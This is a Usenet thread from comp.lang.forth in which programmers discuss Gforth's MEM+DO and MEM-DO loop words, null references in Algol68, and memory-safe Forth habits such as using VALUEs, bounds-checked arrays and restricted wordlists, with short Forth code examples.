  • From minforth@21:1/5 to dxf on Wed Mar 13 14:15:49 2024
    dxf wrote:

    On 13/03/2024 9:00 pm, mhx wrote:
    Anton Ertl wrote:
    [..]
    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )
    [..]

    Interesting! It's always a nuisance when one wants to step backwards.
    Does it work with UNLOOP and does one point at the start of the area or at the address of the first item to process?

    Make one using BEGIN WHILE REPEAT. That's what Forth is for.

    Scratch with the chickens, don't fly with the eagles! ;-)

  • From Anton Ertl@21:1/5 to mhx on Wed Mar 13 16:41:37 2024
    mhx@iae.nl (mhx) writes:
    Anton Ertl wrote:
    [..]
    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )
    [..]

    Interesting! It's always a nuisance when one wants to step backwards.
    Does it work with UNLOOP

    I used the locals stack for the stride in the general case (when the
    stride is not a constant). If MEM+DO works correctly, that value is
    cleaned up automatically. Let's see if it works correctly:

    : foo pad swap dup mem+do unloop exit loop ;
    : bar 123 {: a :} cell foo a . ;
    bar

    This prints 123, so it works as intended. Let's see if LEAVE also
    works as it should:

    : foo 123 {: a :} pad swap dup mem+do leave loop a . ;
    cell foo

    This also prints 123 as it should.

    and does one point at the start of the area
    or at the address of the first item to process?

    For MEM+DO addr is the first item to process, for MEM-DO the last.
    I.e., you use exactly the same parameters whether you process the
    array forwards with MEM+DO or backwards with MEM-DO, as long as ubytes
    is a multiple of +nstride.
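    The parameter convention can be approximated in standard Forth to show
    what "the same parameters" means in practice. This is a sketch, not
    Gforth's implementation; DATA, DIGITS-FORWARD and DIGITS-BACKWARD are
    hypothetical names, and it assumes a positive stride that divides
    ubytes. The backward version also shows why a dedicated word is handy:
    it has to special-case an empty range and use DO rather than ?DO,
    because of the index=limit behaviour of ?DO with a negative +LOOP step.

```forth
\ Sketch: MEM+DO / MEM-DO parameter convention emulated with standard
\ DO ... +LOOP. Not Gforth's implementation. Assumes stride > 0 and
\ ubytes a multiple of stride. The body folds cells into decimal digits
\ so that the visiting order is visible in the result.
create data  1 , 2 , 3 , 4 ,

: digits-forward ( addr ubytes stride -- n )    \ like MEM+DO: addr first
  >r  over + swap                  ( limit=addr+ubytes start=addr )
  0 r> 2swap                       ( acc stride limit start )
  ?do  swap 10 * i @ + swap  dup +loop
  drop ;

: digits-backward ( addr ubytes stride -- n )   \ like MEM-DO: last item first
  over 0= if  drop 2drop 0 exit  then    \ empty range: visit nothing
  >r  over + r@ -                  ( limit=addr start=addr+ubytes-stride )
  0 r> negate 2swap                ( acc -stride limit start )
  do  swap 10 * i @ + swap  dup +loop    \ DO, not ?DO: start=limit is one item
  drop ;
```

    With the same "data 4 cells 1 cells" arguments, DIGITS-FORWARD yields
    1234 and DIGITS-BACKWARD yields 4321.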

    - anton
  • From Paul Rubin@21:1/5 to albert@spenarnc.xs4all.nl on Wed Mar 13 18:03:56 2024
    albert@spenarnc.xs4all.nl writes:
    So [Algol68] nil + reference takes the same place as NULL + pointer in C.

    I'm unfamiliar with Algol68 but if every reference in it can be set to
    nil, that sounds like the same error that Algol-W had. The alternative,
    using an option value, means: 1) if the reference is not wrapped by an
    option type, then it is guaranteed to not be null; 2) if it is wrapped
    by an option type, then the compiler can stop you (or at least warn you)
    if you try to dereference without first checking that it is non-null.

    You are supposed to test for this case, but if you fail you get a "Segmentation fault". As far as Forth goes, that is pretty
    satisfactory security.

    For sure, it is usually better to crash than to keep running and give
    nonsense answers. Of course that usually requires a hardware fault on dereferencing a null pointer, rather than giving whatever is at location
    0 in memory like on unprotected machines.

    Beyond not giving wrong answers, it's usually nice if your program
    doesn't crash too often, especially from program bugs. Getting help
    from the compiler for that is often useful.

  • From albert@spenarnc.xs4all.nl@21:1/5 to no.email@nospam.invalid on Thu Mar 14 09:16:55 2024
    In article <87bk7h1v5v.fsf@nightsong.com>,
    Paul Rubin <no.email@nospam.invalid> wrote:
    albert@spenarnc.xs4all.nl writes:
    So [Algol68] nil + reference takes the same place as NULL + pointer in C.

    I'm unfamiliar with Algol68 but if every reference in it can be set to
    nil, that sounds like the same error that Algol-W had. The alternative,
    using an option value, means: 1) if the reference is not wrapped by an
    option type, then it is guaranteed to not be null; 2) if it is wrapped
    by an option type, then the compiler can stop you (or at least warn you)
    if you try to dereference without first checking that it is non-null.

    You are supposed to test for this case, but if you fail you get a
    "Segmentation fault". As far as Forth goes, that is pretty
    satisfactory security.

    For sure, it is usually better to crash than to keep running and give
    nonsense answers. Of course that usually requires a hardware fault on
    dereferencing a null pointer, rather than giving whatever is at location
    0 in memory like on unprotected machines.

    Algol68 doesn't crash. It gives a run time error of the type
    dereferencing a <nil> (<ref> <ref> <my_struct> aap) on line .. of ...
    called from line .. of ..
    ..
    called from line .. of main

    Beyond not giving wrong answers, it's usually nice if your program
    doesn't crash too often, especially from program bugs. Getting help
    from the compiler for that is often useful.

    You can't get much help from the compiler for uninitialised references
    like this. Either it crashes in the first run or it is insidious.

    Groetjes Albert
  • From Paul Rubin@21:1/5 to albert@spenarnc.xs4all.nl on Thu Mar 14 14:52:43 2024
    albert@spenarnc.xs4all.nl writes:
    Algol68 doesn't crash. It gives a run time error of the type

    Well that's what I mean by crashing. The program is terminated "involuntarily", or alternatively there is some way to catch the exception. Either way, the computation doesn't proceed.
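    In Forth terms, an Algol68-style checked dereference can be sketched
    with THROW and CATCH: the error becomes an exception that a caller can
    catch, instead of reading whatever is at address 0 or dying with a
    segmentation fault. CHECKED@, NIL-DEREF, BOX and TRY-NIL are
    hypothetical names, and the throw code 1001 is an arbitrary positive
    value (Forth-2012 reserves -4095..-1 for the standard and the system).

```forth
1001 constant nil-deref          \ arbitrary positive THROW code (assumption)

\ Fetch through ADDR, but throw NIL-DEREF instead of reading address 0.
: checked@ ( addr -- x )
  dup 0= nil-deref and throw  @ ;

\ Usage: a caught nil dereference leaves its throw code on the stack.
variable box  42 box !
: try-nil ( -- code )  0 ['] checked@ catch  nip ;
```

    Here "box checked@" returns 42, while TRY-NIL returns NIL-DEREF.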

    You can't get much help from the compiler for uninitialised references
    like this. Either it crashes in the first run or it is insidious.

    No idea about Algol68 but in (at least some) other languages, the idea
    of having references instead of pointers is that it is impossible to
    create an uninitialised reference.

  • From minforth@21:1/5 to Paul Rubin on Fri Mar 15 09:26:11 2024
    Paul Rubin wrote:

    albert@spenarnc.xs4all.nl writes:
    Algol68 doesn't crash. It gives a run time error of the type

    Well that's what I mean by crashing. The program is terminated "involuntarily", or alternatively there is some way to catch the exception. Either way, the computation doesn't proceed.

    You can't get much help from the compiler for uninitialised references
    like this. Either it crashes in the first run or it is insidious.

    No idea about Algol68 but in (at least some) other languages, the idea
    of having references instead of pointers is that it is impossible to
    create an uninitialised reference.

    In Forth parlance: unless you're doing system programming where you need it, don't use direct memory operations like @ ! MOVE, etc. This also prohibits
    the use of VARIABLE. VARIABLES are uninitialized and are accessed by @ !.

    So I regularly use either xVALUEs (x means different data types) or data objects (for compound or dynamic types) with access methods. This results
    in cleaner code and improves memory safety.

  • From Paul Rubin@21:1/5 to minforth on Fri Mar 15 11:37:55 2024
    minforth@gmx.net (minforth) writes:
    In Forth parlance: unless you're doing system programming where you
    need it, don't use direct memory operations like @ ! MOVE, etc. This
    also prohibits the use of VARIABLE. VARIABLES are uninitialized and
    are accessed by @ !.

    That helps but I'm sure there are other hazards. What do you do about
    arrays? What about ALLOT or ALLOCATE?

    At least in gforth, VARIABLEs are initialized to 0. That seems like a
    good thing for implementations to do in general.

    So I regularly use either xVALUEs (x means different data types) or data objects (for compound or dynamic types) with access methods. This results
    in cleaner code and improves memory safety.

    Yes I should start doing that too. I only mess with Forth for fun
    though. I feel like it helps me stay sharp compared with safer
    languages, even including C. I'm not old enough to have written
    significant amounts of machine code.

  • From minforth@21:1/5 to Paul Rubin on Fri Mar 15 19:55:07 2024
    Paul Rubin wrote:

    minforth@gmx.net (minforth) writes:
    In Forth parlance: unless you're doing system programming where you
    need it, don't use direct memory operations like @ ! MOVE, etc. This
    also prohibits the use of VARIABLE. VARIABLES are uninitialized and
    are accessed by @ !.

    That helps but I'm sure there are other hazards. What do you do about arrays?

    Arrays are heap-allocated dynamic objects with access methods. Direct memory access is virtually impossible (except with "carnal knowledge"). There
    is an array stack for more complex operations and a chain of array values
    for persistent storage. Stack and array values contain only pointers.

    F.ex.
    XZ14[ designates array (matrix or vector) value XZ14
    <index or indices> ] reads a vector/matrix element
    <index or indices> ]! writes to a vector/matrix element
    M"[ 2 1 ] from 3rd array on array stack read 1st element in 2nd row
    (M[ M'[ M"[ designate top, second and third matrix on array stack)
    XZ14[ ]' pushes transposed matrix XZ14 onto array stack
    XZ14 (or TO XZ14) writes top matrix to array value XZ14
    et cetera

    IOW there is a special word set for array operations. Operators check
    that there is no memory violation like index out of bounds, and do some housekeeping like (re)allocating memory.
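    The core of such an index check fits in a few lines of standard Forth.
    This is a hypothetical sketch, not minforth's word set: ARRAY, CHECKED,
    ARR@, ARR! and INDEX-ERROR are illustrative names, arrays are fixed-size
    cell arrays, and elements are zeroed at creation so nothing is read
    uninitialised.

```forth
1001 constant index-error        \ arbitrary positive THROW code (assumption)

\ ARRAY ( n "name" -- ); name: ( -- addr ). Layout: element count, then
\ n cells, all zero-filled.
: array ( n "name" -- )
  create  dup ,  here swap cells dup allot erase ;

\ Address of element I, or throw INDEX-ERROR. The unsigned comparison
\ also rejects negative indices.
: checked ( i addr -- elem-addr )
  2dup @ u< 0= index-error and throw
  cell+ swap cells + ;

: arr@ ( i addr -- x )  checked @ ;
: arr! ( x i addr -- )  checked ! ;

5 array xs                        \ usage: valid indices are 0..4
```

    Both "5 xs arr@" and "-1 xs arr@" throw INDEX-ERROR instead of touching
    memory outside XS.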

    What about ALLOT or ALLOCATE?

    Above word set would be overkill for normal Forth applications.
    Nevertheless you could SEAL your search order and exclude or make
    safer versions of ALLOT et al for your application wordlist.
    I never understood why SEAL did not make it into ANS Forth's
    Search-Order word set, as it is just a simple SET-ORDER thing.
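    A sketch of that SET-ORDER approach using only Search-Order words.
    APP-WORDS, the replacement ALLOT and SEAL are hypothetical; this ALLOT
    refuses negative sizes and zero-fills what it reserves, and this SEAL
    simply keeps the first wordlist of the current search order. A given
    system's own SEAL may behave differently.

```forth
wordlist constant app-words          \ hypothetical application wordlist

\ Put a safer ALLOT into APP-WORDS. Inside its body, ALLOT still finds the
\ system word: APP-WORDS is not in the search order, and the new
\ definition is not findable until ";" anyway.
get-current  app-words set-current
: allot ( n -- )
  dup 0< abort" negative ALLOT refused"
  here swap dup allot erase ;        \ reserve n bytes, then zero them
set-current

\ Hypothetical SEAL: keep only the first wordlist of the search order.
: seal ( -- )
  get-order  over >r                 \ remember wid1 (searched first)
  0 ?do drop loop                    \ discard all n wids
  r> 1 set-order ;
```

    After "forth-wordlist app-words 2 set-order seal", only APP-WORDS is
    searched, so the application sees the safer ALLOT and nothing else
    that was not deliberately put there.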

    At least in gforth, VARIABLEs are initialized to 0. That seems like a
    good thing for implementations to do in general.

    Yes and no. It is easy to forget correct initialization when 0 is wrong.
    VALUEs explicitly require conscious initialization.

  • From minforth@21:1/5 to dxf on Sat Mar 16 09:35:13 2024
    dxf wrote:
    At least in gforth, VARIABLEs are initialized to 0. That seems like a
    good thing for implementations to do in general.

    That's something I'd do for VALUEs should I move to omit the numeric
    prefix at creation. By automatically initializing VALUEs with 0, I can pretend - if only to myself - that VALUEs are different from VARIABLEs.

    Indeed, if you only work with integers in cell size, VARIABLEs and some
    code discipline are sufficient.

    VALUEs are like variants in VBA. You can only change them with TO <NAME>,
    and TO (alias =>) is the same for all data types. The standard also uses TO to write locals and FVALUEs. Non-standard $VALUEs (for dynamic strings) or DVALUEs/ZVALUEs can be very practical too. I also use range-limited VALUEs. None of this works with VARIABLEs.

    When you implement your type-specific TO variants with built-in
    appropriate checking, you are on the safer side.
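    A minimal illustration of a range-limited value. Standard Forth offers
    no portable way to attach a check to TO itself, so this sketch routes
    writes through a checked setter instead. PERCENT, SET-PERCENT and
    OUT-OF-RANGE are hypothetical names, the range 0..100 is arbitrary, and
    nothing stops other code from bypassing the setter with TO PERCENT.

```forth
1002 constant out-of-range      \ arbitrary positive THROW code (assumption)

0 value percent                 \ VALUE: initialised explicitly at creation

\ Checked write: throw instead of storing a value outside 0..100.
: set-percent ( n -- )
  dup 0 101 within 0= out-of-range and throw
  to percent ;
```

    "42 set-percent" stores 42; "101 set-percent" throws OUT-OF-RANGE and
    leaves PERCENT unchanged.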

  • From Anton Ertl@21:1/5 to minforth on Sat Mar 16 10:20:16 2024
    minforth@gmx.net (minforth) writes:
    Non-standard $VALUEs (for dynamic strings) or
    DVALUEs/ZVALUEs can be very practical too.

    2VALUE is standard.

    - anton
  • From minforth@21:1/5 to Anton Ertl on Sat Mar 16 11:13:07 2024
    Anton Ertl wrote:

    minforth@gmx.net (minforth) writes:
    Non-standard $VALUEs (for dynamic strings) or
    DVALUEs/ZVALUEs can be very practical too.

    2VALUE is standard.

    2VALUEs are for cell pairs. DVALUEs do not exist, because
    the standard assumes equivalency of double numbers and cell
    pairs (although mathematically they are not).
    ZVALUEs are for complex numbers.
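    The conflation is easy to demonstrate: a standard 2VALUE holds any cell
    pair, so the same value can hold a double number and later a string
    (c-addr u), and nothing records which one it currently contains. PAIR,
    STORE-DOUBLE and STORE-STRING are hypothetical names.

```forth
0. 2value pair                      \ 2VALUE from the Double-Number word set

: store-double ( -- )  1234567. to pair ;   \ a double number ...
: store-string ( -- )  s" abc" to pair ;    \ ... or a c-addr u pair
```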

  • From mhx@21:1/5 to All on Sun Mar 17 07:30:07 2024
    Interesting. I didn't know that the TO concept was coined by Moore (before Bartholdi).

    -marcel

  • From Tristan Wibberley@21:1/5 to minforth on Tue Mar 19 19:57:35 2024
    On 05/03/2024 14:03, minforth wrote:
    Tristan Wibberley wrote:


    Or special purpose computers that are not mass marketed, but I wasn't
    aware they'd fixed all the public market computers. Thanks for the info.

    You are still in for some nasty surprises with "public market" ARM CPUs. f.ex.
    https://developer.arm.com/documentation/den0013/d/Porting/Alignment

    And then we're not even trying to talk about what's in use and for sale
    today but rather what will be in use over the next 6 decades. Most of
    the historical peculiarities that are eliminated with more complex
    hardware instead of longer software can be expected to be present at
    some point during that period because more complex hardware is already a difficult problem for information security and I'd expect those
    peculiarities wouldn't have been present if there weren't some
    efficiency earned.

  • From minforth@21:1/5 to Tristan Wibberley on Tue Mar 19 21:39:41 2024
    Tristan Wibberley wrote:

    On 05/03/2024 14:03, minforth wrote:
    Tristan Wibberley wrote:


    Or special purpose computers that are not mass marketed, but I wasn't
    aware they'd fixed all the public market computers. Thanks for the info.

    You are still in for some nasty surprises with "public market" ARM CPUs.
    f.ex.
    https://developer.arm.com/documentation/den0013/d/Porting/Alignment

    And then we're not even trying to talk about what's in use and for sale
    today but rather what will be in use over the next 6 decades. Most of
    the historical peculiarities that are eliminated with more complex
    hardware instead of longer software can be expected to be present at
    some point during that period because more complex hardware is already a difficult problem for information security and I'd expect those
    peculiarities wouldn't have been present if there weren't some
    efficiency earned.

    Although repeatedly proclaimed dead, we can still observe Moore's Law.
    With the increasing 3-dimensional design of CPUs and the hunger for massive computing power through AI applications, the trend is likely to continue. Another driver is the need for lower energy consumption.

    This means that as the complexity of systems grows almost exponentially,
    the consequences of software errors will become increasingly dangerous in
    the same magnitude. Just as a professional electrician only works with insulated tools, a professional programmer should also choose his tools,
    e.g. programming languages, which do not allow even simple errors to occur
    in the first place. They should also use operating systems and software containers equipped with protective functions.

    These means of protection that already exist today are not available in
    archaic programming languages such as C or Forth. Stoic language
    conservatism (a tenor in standard Forth) won't help.
